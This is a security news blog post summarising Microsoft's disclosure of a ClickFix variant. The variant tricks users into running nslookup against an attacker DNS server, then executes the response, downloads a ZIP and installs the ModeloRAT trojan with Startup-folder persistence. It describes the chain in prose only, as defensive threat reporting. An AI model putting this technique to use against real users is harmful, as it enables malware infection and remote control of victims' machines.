top of page
Search

Microsoft Warns of Evolving ClickFix Malware Leveraging DNS Lookups

  • 3 days ago
  • 2 min read

Key Findings


  • Microsoft warns of a new ClickFix variant that tricks users into running a malicious nslookup command through the Windows Run dialog to retrieve a second-stage payload via DNS.

  • Attackers use cmd.exe to perform a DNS lookup against a hard-coded external server, and the `Name:` response is extracted and executed as the second-stage payload.

  • This DNS-based approach allows attackers to signal and deliver payloads via their own infrastructure, reducing reliance on web requests and helping the malicious activity blend into normal network traffic.

  • The payload downloads a ZIP from an external server, extracts a Python script to conduct reconnaissance, and drops a VBScript that launches ModeloRAT, a Python-based RAT.

  • Attackers achieve persistence by creating a Windows shortcut in the Startup folder, ensuring the malware runs at every system startup.


Background


ClickFix is a social engineering technique that has evolved into multiple variants over the past two years. Typically, it uses fake CAPTCHA or error messages to trick victims into infecting their own systems, helping attackers evade security defenses.


DNS-Based Staging


In the latest ClickFix variant, attackers use cmd.exe to perform a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver. The `Name:` DNS response is extracted and executed as the second-stage payload.


This DNS-based approach allows attackers to signal and deliver payloads via their own infrastructure, reducing reliance on web requests and helping the malicious activity blend into normal network traffic.


Payload Analysis


Upon execution of the second-stage payload, the attack proceeds through a chain that leads to downloading a ZIP file, extracting a portable Python bundle and malicious Python code, and then running a malicious Python script for host/domain reconnaissance and discovery commands.


Finally, the attack drops a VBScript payload called ModeloRAT, a Python-based remote access trojan, along with a Windows shortcut in the Startup folder for persistence.


Conclusion


Microsoft warns that this new ClickFix variant uses DNS as a "lightweight staging or signaling channel," allowing attackers to reach their own infrastructure and add a validation step before running the second-stage payload. This method reduces reliance on web requests and helps hide malicious activity in normal network traffic.


Sources


  • https://securityaffairs.com/188039/hacking/microsoft-alerts-on-dns-based-clickfix-variant-delivering-malware-via-nslookup.html

  • https://www.facebook.com/thehackernews/posts/%EF%B8%8F-microsoft-detailed-a-new-clickfix-variant-abusing-dns-lookups-via-nslookup-to-/1295865229244724/

  • https://radar.offseq.com/threat/microsoft-discloses-dns-based-clickfix-attack-usin-fbef1593

  • https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

Recent Posts

See All
Defeating AI with AI

Key Findings Generative AI and agentic AI are increasingly used by threat actors to conduct faster and more targeted attacks. One capability that AI improves for threat actors is the ability to profil

 
 
 

Comments

  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page